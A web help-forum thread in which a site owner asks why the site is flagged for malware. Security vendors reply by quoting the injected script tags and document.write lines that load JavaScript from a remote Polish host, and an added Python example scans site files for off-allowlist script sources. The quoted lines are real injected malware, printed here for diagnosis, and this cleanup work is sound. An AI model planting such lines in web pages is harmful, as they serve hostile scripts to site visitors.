Malware
by rico27511
5 months ago

My website at http://www.carolina-images.com is supposedly infected with malware but I am unable to locate anything suspicious. Any suggestions?

by anirban
5 months ago

Hello :-),

Jaal Scan ID # 18734932084-184 output

Malicious code detected on line 158 of www.carolina-images.com

starts with

<!—ript src=hxxp://kat alog-s tron.waa.pl/temp lates_c/s>

Note: This is a free limited scan, please check out other pages too.

Please look at the copy of the page on the server after you have logged into your hosting directory using ftp/sftp/scp etc. Sometimes, it might be useful to wipe out the hosting directory. You can probably get a backup copy of your site from your hosting provider. Please remember to check for malware on the server and in the backend database too. Also, remember to scan your local computer with multiple Anti-virus engines to detect the presence of any resident malware.

If you have any specific issues feel free to ask for help.

We also provide vulnerability identification and mitigation services to help prevent websites from being infected in the first place.
For free monitoring services, you can visit www.stopthehacker.com/services/blacklist-monitoring/.

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site: www.stopthehacker.com
Blog: www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a time™

by WhiteFirDesign
5 months ago

The file http://www.carolina-images.com/Pages/Featured/resources/javascript/AC_RunActiveContent.js also contains malware; at the bottom of the file are the following malware scripts:

document.write('<script src=http://katalog-stron.waa.pl/templates_c/search.php ><\/script>');
document.write('<script src=http://katalog-stron.waa.pl/templates_c/search.php ><\/script>');
document.write('<script src=http://katalog-stron.waa.pl/templates_c/search.php ><\/script>');

White Fir Design
Website Malware Removal Service

by WeWatch
5 months ago

Between your closing body tag and opening head tag you have:

<scr ipt src=http : // katalog-stron.waa. pl/templates_c/search.php ></script>

This is typically the result of a virus that steals FTP login credentials. You might find this virus on a PC that has FTP access to your website.

Let the forum here know if you have any further questions.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
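
Added example, not part of any post in this thread: a Python check to run over a downloaded copy of the site. It flags every script source on a host outside an allowlist, covering both patterns reported above: a bare script tag injected into a page and document.write lines appended to a .js file. The function names, the hosts injected.example and www.example.com, and the sample files are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# <script ... src=URL>, quoted or not; also matches inside document.write('...') strings.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)
WEB_EXTS = (".html", ".htm", ".php", ".js")

def scan_text(text, allowed_hosts):
    """Return (line_no, host, kind) for every script src whose host is not allowed."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in SCRIPT_SRC.finditer(line):
            host = urlparse(m.group(1)).hostname  # None for relative (same-site) paths
            if host is None or host.lower() in allowed_hosts:
                continue
            kind = "document.write" if "document.write" in line[:m.start()] else "tag"
            findings.append((line_no, host, kind))
    return findings

def scan_tree(root, allowed_hosts):
    """Walk a downloaded copy of the site and scan every web file."""
    results = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if name.lower().endswith(WEB_EXTS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line_no, host, kind in scan_text(fh.read(), allowed_hosts):
                        results.append((os.path.relpath(path, root), line_no, host, kind))
    return sorted(results)

def demo():
    """Constructed sample site: one injected tag in HTML, one line appended to a .js file."""
    samples = {
        "index.html": '<html><head><script src="js/app.js"></script></head><body>hi</body>\n'
                      "<script src=http://injected.example/t/search.php ></script></html>\n",
        "app.js": "function run() { return 1; }\n"
                  "document.write('<script src=http://injected.example/t/search.php ><\\/script>');\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, allowed_hosts={"www.example.com"})

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

For a real site, pass the site's own hostname plus any third-party script hosts it deliberately uses as allowed_hosts, and review every remaining finding by hand.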

by rico27511
5 months ago

Thanks to everyone for the info. That gives me a place to start.
